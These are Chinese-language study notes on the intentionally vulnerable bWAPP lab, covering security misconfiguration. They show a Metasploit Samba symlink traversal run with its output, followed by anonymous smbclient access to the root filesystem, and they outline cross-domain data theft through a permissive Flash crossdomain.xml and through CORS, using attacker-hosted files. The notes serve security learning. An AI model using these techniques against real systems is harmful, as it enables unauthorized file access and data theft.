bWAPP学习笔记 - A5 Security Misconfiguration

Arbitrary File Access (Samba) - 任意文件访问Samba

用到的工具 Metasploit

msf5> use auxiliary/admin/smb/samba_symlink_traversal
msf5 auxiliary(admin/smb/samba_symlink_traversal)> set RHOSTS 172.16.8.134
msf5 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
msf5 auxiliary(admin/smb/samba_symlink_traversal) > exploit 

[*] Running module against 172.16.8.134
[*] 172.16.8.134:445 - Connecting to the server...
[*] 172.16.8.134:445 - Trying to mount writeable share 'tmp'...
[*] 172.16.8.134:445 - Trying to link 'rootfs' to the root filesystem...
[*] Auxiliary module execution completed

另一个终端执行如下命令：

$ smbclient //172.16.8.134/tmp
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> cd rootfs
smb: \> 发挥你的想象力吧~~~

---

Cross-Domain Policy File (Flash)

本题说的时 Flash的跨域访问策略问题
对应的文件是 crossdomain.xml，如果该文件的访问策略设置不正确，可以导致任意远程Flash文件读取服务器文件
下图中可以看到，允许任意域的Flash访问

在evil文件夹找到xdx.as，重新填入对应的服务器地址

用Adobe Flash CS3及以上从新编译一个新的xdx.swf文件，并加入xdx.as这个文件

将编译好的xdx.swf与xdx.php放到服务器的另一个文件夹内。
先登录bWAPP页面，然后在另一个服务器上请求xdx.php，最终会返回secret的内容

为了这题，还特意去装了一个Adobe Flash。。。

---

Cross-Origin Resource Sharing (AJAX)

本题讲的是AJAX的跨域资源请求问题
在另一台服务器上，修改evil文件夹内的，attack-cors.htm文件中的服务器路径
然后在浏览器运行attack-cors.htm即可